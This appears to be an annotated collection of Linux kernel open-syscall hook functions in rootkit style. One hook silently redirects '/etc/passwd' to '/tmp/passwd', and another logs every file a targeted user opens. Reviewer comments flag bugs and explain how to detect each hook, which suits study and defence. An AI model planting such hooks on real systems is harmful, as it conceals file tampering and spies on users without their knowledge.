//Define our new sneaky version of the 'open' syscall
//
// Replacement handler for the open syscall. When the user-supplied path
// contains the substring "/etc/passwd", the caller's own path buffer is
// overwritten with "/tmp/passwd" before the saved original handler is
// invoked, so the open is redirected to a different file. original_call
// is defined elsewhere in this module.
//
// Review notes (everything below is visible in this block):
//  - Only two arguments are forwarded; the other open hooks on this page
//    forward a third `mode` argument as well.
//  - strstr() dereferences `pathname` directly, while the copy_to_user()
//    call a line later treats the same pointer as a user-space address.
//  - The match is a substring match and the overwrite always starts at the
//    beginning of the buffer: any path containing "/etc/passwd" has its
//    first sizeof(replace) (12) bytes replaced, terminator included.
//  - The const qualifier is cast away and the copy_to_user() result is
//    ignored.
//  - Because the caller's buffer is modified in place, the rewrite is
//    observable from user space after the call returns, and the resulting
//    descriptor refers to /tmp/passwd (e.g. visible via /proc/<pid>/fd).
//    Syscall-table integrity checks are the usual way to detect this class
//    of hook.
asmlinkage int sneaky_sys_open(const char *pathname, int flags)
{
    if (strstr(pathname, "/etc/passwd") != NULL) {
        char replace[] = "/tmp/passwd";
        // Writes 12 bytes ("/tmp/passwd" plus NUL) over the start of the
        // caller's buffer; return value not checked.
        copy_to_user((void *)pathname, &replace, sizeof(replace));
        return original_call(pathname, flags);
    } else {
        //printk(KERN_INFO "Very, very Sneaky!\n");
        return original_call(pathname, flags);
    }
}
/*
 * The function we'll replace sys_open (the function
 * called when you call the open system call) with. To
 * find the exact prototype, with the number and type
 * of arguments, we find the original function first
 * (it's at fs/open.c).
 *
 * In theory, this means that we're tied to the
 * current version of the kernel. In practice, the
 * system calls almost never change (it would wreak havoc
 * and require programs to be recompiled, since the system
 * calls are the interface between the kernel and the
 * processes).
 */
/*
 * Replacement open handler that logs every path opened by one monitored
 * uid (the file-scope `uid`, defined elsewhere) and then forwards to the
 * saved original handler (original_call, also defined elsewhere). It also
 * emits a kernel stack trace on every open, regardless of uid.
 *
 * Review notes:
 *  - All output goes to the kernel ring buffer: an "Opened file by <uid>: "
 *    line plus a dump_stack() bracketed by the two "L5 syscall dump stack"
 *    markers for each open, which makes this hook easy to spot in
 *    dmesg/journal output.
 *  - The path is echoed one byte per printk() call; on kernels that do not
 *    treat consecutive printk()s as a continuation, each character may land
 *    on its own log line (presumably — depends on the target kernel).
 *  - get_user() return values are ignored, and the loop runs until a NUL
 *    byte is read with no upper bound on the length.
 */
asmlinkage int our_sys_open(const char *filename, int flags, int mode)
{
    int i = 0;
    char ch;

    /*
     * Check if this is the user we're spying on
     */
    if (uid == current->cred->uid.val) {
        /*
         * Report the file, if relevant
         */
        printk("Opened file by %d: ", uid);
        /* Pull the path out of user space one byte at a time and echo it. */
        do {
            get_user(ch, filename + i);
            i++;
            printk("%c", ch);
        } while (ch != 0);
        printk("\n");
    }
    /* Unconditional: runs for every caller, not only the monitored uid. */
    printk(KERN_INFO "L5 syscall dump stack start.\n");
    dump_stack();
    printk(KERN_INFO "L5 syscall dump stack over.\n");
    /*
     * Call the original sys_open - otherwise, we lose
     * the ability to open files
     */
    return original_call(filename, flags, mode);
}
/*
 * Open-syscall hook that emits one fixed log line and then defers to the
 * saved original handler (original_call is defined elsewhere).
 *
 * The literal "<0>" prefix on the message is an emergency log-level marker
 * (the pre-"\001" encoding), so every open() on the box produces a
 * highest-priority kernel log entry — trivially visible in dmesg.
 */
asmlinkage int sys_our_open(const char *filename, int flags, int mode)
{
    int rc;

    printk("<0>open system call\n");
    rc = original_call(filename, flags, mode);
    return rc;
}
/*
 * Open-syscall hook that logs a marker line tagged with MODULE_NAME (a
 * macro defined elsewhere) and then forwards the call unchanged to the
 * saved original handler (original_call, also defined elsewhere).
 *
 * Every open() produces a "<MODULE_NAME>: PWNED" entry in the kernel log,
 * which is the obvious detection signal for this hook.
 */
static asmlinkage int hijacker_sys_open(const char *file, int flags, int mode)
{
    int ret;

    printk(MODULE_NAME ": PWNED\n");
    ret = original_call(file, flags, mode);
    return ret;
}